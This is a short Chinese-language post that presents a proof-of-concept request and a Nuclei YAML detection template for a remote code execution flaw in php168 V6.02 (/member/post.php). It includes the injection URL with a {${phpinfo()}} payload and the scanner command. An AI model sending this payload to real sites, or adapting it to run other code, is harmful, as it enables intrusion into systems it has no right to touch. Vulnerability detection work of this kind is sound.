Nuclei关于php168 V6.02 的POC

漏洞利用

这个漏洞是在 /member/post.php 中存在一个代码执行漏洞

利用步骤：

        1. 先注册一个用户
        2.执行下面代码，get方式就可以了

http://targetURL/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML

利用Nuclei 进行检测这个漏洞

id: php168-v602

info:
  name: php168-v6.02 - Remote Code Execution
  author: dr_set
  severity: high
  description: PHP168 V6.02 has a remote code execution vulnerability.
  reference: https://www.seebug.org/vuldb/ssvid-94372
  tags: remote, code execution, php168, rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML"
#    headers:
#        Cookie: ${cookie}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by md on 2022/10/05
# 使用方法： 需要加上参数   -H "Cookie: this is cookie"

 ./nuclei.exe   -u http://192.168.83.242:9090/ -t .\php168-v602.yaml -H "Cookie: your Cookie"

如上图所示，当你的php168网站存在这个问题的时候，就会被检测到了